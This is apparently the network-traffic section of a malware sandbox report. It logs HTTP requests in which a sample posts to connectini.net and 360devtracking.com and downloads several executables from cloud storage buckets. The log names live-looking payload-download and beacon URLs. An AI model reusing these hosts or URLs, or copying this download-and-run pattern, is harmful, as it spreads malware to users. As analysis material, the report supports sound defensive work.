Network Analysis

POST /Series/SuperNitouDisc.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 51 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com Connection: Keep-Alive

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /WeUninstalled.exe HTTP/1.1 Host: wewewe.s3.eu-central-1.amazonaws.com

GET /widgets/powerOff.exe HTTP/1.1 Host: doll.s3.pl-waw.scw.cloud

HTTP/1.1 404 Not Found x-amz-id-2: tx07e94689ee9e4fb580859-00636c4a84 x-amz-request-id: tx07e94689ee9e4fb580859-00636c4a84 content-type: application/xml date: Thu, 10 Nov 2022 00:49:08 GMT transfer-encoding: chunked

GET /widgets/powerOff.exe HTTP/1.1 Host: doll.s3.pl-waw.scw.cloud

HTTP/1.1 404 Not Found x-amz-id-2: txd9e2ff0ef08b4c7fb21c9-00636c4a85 x-amz-request-id: txd9e2ff0ef08b4c7fb21c9-00636c4a85 content-type: application/xml date: Thu, 10 Nov 2022 00:49:09 GMT transfer-encoding: chunked

GET /S2S/Disc/Disc.php?ezok=power2off2&tesla=8 HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 10 Nov 2022 00:49:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

POST /Series/Conumer4Publisher.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/publisher/1/KR.json HTTP/1.1 Host: connectini.net Cache-Control: no-store,no-cache Pragma: no-cache

HTTP/1.1 200 OK Server: nginx Date: Thu, 10 Nov 2022 00:49:42 GMT Content-Type: application/json Content-Length: 4184 Last-Modified: Mon, 11 Apr 2022 13:54:12 GMT Connection: keep-alive ETag: "62543304-1058" X-Powered-By: PleskLin Accept-Ranges: bytes

POST /Series/Conumer2kenpachi.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 10 Nov 2022 00:50:18 GMT Content-Type: application/json Content-Length: 7808 Last-Modified: Thu, 10 Nov 2022 00:15:02 GMT Connection: keep-alive ETag: "636c4286-1e80" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/configPoduct/2/goodchannel.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 10 Nov 2022 00:50:19 GMT Content-Type: application/json Content-Length: 344 Connection: keep-alive X-Accel-Version: 0.01 Last-Modified: Mon, 11 Apr 2022 13:48:37 GMT ETag: "158-5dc613383b411" Accept-Ranges: bytes X-Powered-By: PleskLin

HEAD /workflow/poweroff-1mo67u5vspq3.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: 160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK content-length: 589824 x-amz-id-2: txc30e5fd1ad5944d89d521-00636c4a56 accept-ranges: bytes last-modified: Tue, 08 Nov 2022 10:57:27 GMT etag: "95c22189a5542b6c49204118750be5d9" x-amz-request-id: txc30e5fd1ad5944d89d521-00636c4a56 x-amz-version-id: 1667905047688937 content-type: application/x-msdownload date: Thu, 10 Nov 2022 00:48:22 GMT

GET /workflow/poweroff-1mo67u5vspq3.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: 160dd0af-5534-4369-972f-5aa0f99c9324.s3.pl-waw.scw.cloud Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK content-length: 589824 x-amz-id-2: txd69b3c2208ee43db823dc-00636c4a57 accept-ranges: bytes last-modified: Tue, 08 Nov 2022 10:57:27 GMT etag: "95c22189a5542b6c49204118750be5d9" x-amz-request-id: txd69b3c2208ee43db823dc-00636c4a57 x-amz-version-id: 1667905047688937 content-type: application/x-msdownload date: Thu, 10 Nov 2022 00:48:23 GMT

GET /four-spoon/up-da-b135l0bjgejx.exe HTTP/1.1 Host: nova-brothers.s3.pl-waw.scw.cloud Connection: Keep-Alive

HTTP/1.1 200 OK content-length: 375808 x-amz-id-2: tx74466251b0704e3ca53fd-00636c4a6e accept-ranges: bytes last-modified: Fri, 04 Nov 2022 17:48:11 GMT etag: "6e4c946eceaf7b60c29fdf78df7befda" x-amz-request-id: tx74466251b0704e3ca53fd-00636c4a6e x-amz-version-id: 1667584091757177 content-type: application/octet-stream date: Thu, 10 Nov 2022 00:48:47 GMT

GET /four-spoon/pub-b135l0bjgejx.exe HTTP/1.1 Host: nova-brothers.s3.pl-waw.scw.cloud Connection: Keep-Alive

HTTP/1.1 200 OK content-length: 600576 x-amz-id-2: tx408bf31c7ff5418886e67-00636c4a6f accept-ranges: bytes last-modified: Fri, 04 Nov 2022 17:47:56 GMT etag: "436e921da691211e16a1adb9ff4d90cd" x-amz-request-id: tx408bf31c7ff5418886e67-00636c4a6f x-amz-version-id: 1667584076649560 content-type: application/octet-stream date: Thu, 10 Nov 2022 00:48:47 GMT

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 10 Nov 2022 01:48:55 GMT Date: Thu, 10 Nov 2022 00:48:55 GMT Connection: keep-alive

GET /four-spoon/hand-b135l0bjgejx.exe HTTP/1.1 Host: nova-brothers.s3.pl-waw.scw.cloud

HTTP/1.1 200 OK content-length: 129024 x-amz-id-2: tx8c6723f5287b48c1a639e-00636c4a7f accept-ranges: bytes last-modified: Fri, 04 Nov 2022 17:47:51 GMT etag: "70a9b681d28137cfb4f0b4ab59ef51c6" x-amz-request-id: tx8c6723f5287b48c1a639e-00636c4a7f x-amz-version-id: 1667584071703478 content-type: application/octet-stream date: Thu, 10 Nov 2022 00:49:03 GMT

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 10 Nov 2022 01:49:08 GMT Date: Thu, 10 Nov 2022 00:49:08 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 10 Nov 2022 00:49:26 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2022-11-10-00; expires=Sat, 10-Dec-2022 00:49:26 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=AakniGO1aTghTPm6YcUrrgpyMXDHbxqV8m0n6yS1TvkephWkN1cU9ZBDSg; expires=Tue, 09-May-2023 00:49:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=lg39RX3nOgT5c1IVUHR8H4e3ku-Dx5fAXHu44Qw80KGXN0Uzx8yFGumsb4qTiT89UBepa1l6Z34MNofpUP-6R1lydoOSInZCi1OnQTSwVOiK0_hDRq0epwIs2ZQWsKKGfo0sHVV2uAzH6i3uTlM8L9XTugXbCmWF8b_OeZaIZwM; expires=Fri, 12-May-2023 00:49:26 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 10 Nov 2022 01:49:46 GMT Date: Thu, 10 Nov 2022 00:49:46 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 10 Nov 2022 01:49:46 GMT Date: Thu, 10 Nov 2022 00:49:46 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 10 Nov 2022 01:49:47 GMT Date: Thu, 10 Nov 2022 00:49:47 GMT Connection: keep-alive

POST /ezzcbmueaa4iwhvb/fmovies HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 360devtracking.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue